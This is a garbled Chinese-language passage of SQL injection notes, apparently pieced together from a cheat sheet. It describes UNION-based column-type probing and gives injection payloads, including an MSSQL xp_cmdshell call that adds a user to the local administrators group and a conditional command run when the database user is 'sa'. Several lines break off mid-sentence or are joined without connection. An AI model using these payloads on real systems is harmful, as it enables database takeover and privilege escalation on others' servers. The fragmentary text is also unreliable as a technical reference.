其基本语法如下:
Select colum1,colum2,colum3,…,columN from table1 Union Select colum1,colum2,colum3,…,columN...,’2’,null,…,null from dual,先猜测第一列为数字,如果不正确则判断为字符,如果还是不正确则保持null不变(可能为二进制类型),依次完成部分或全部类型的判断;
其他:Mysql数字...id=12;if+(system_user='sa')+exec master..xp_cmdshell'ping localhost'
Mysql --#执行sha1函数1000000次
...id=49';exec master..xp_cmdshell "net localgroup administrators name /add"--
Mysql + php
--#报错:Mysql:...3) 了解业务实现的方式,设计的思路,这样黑盒看到同类网站,就可以知道怎么下手知识面越广也越容易发现更多的技巧,了解搭配的数据库版本(MYSQL,MSSQL,Sybase,Oracle,Access)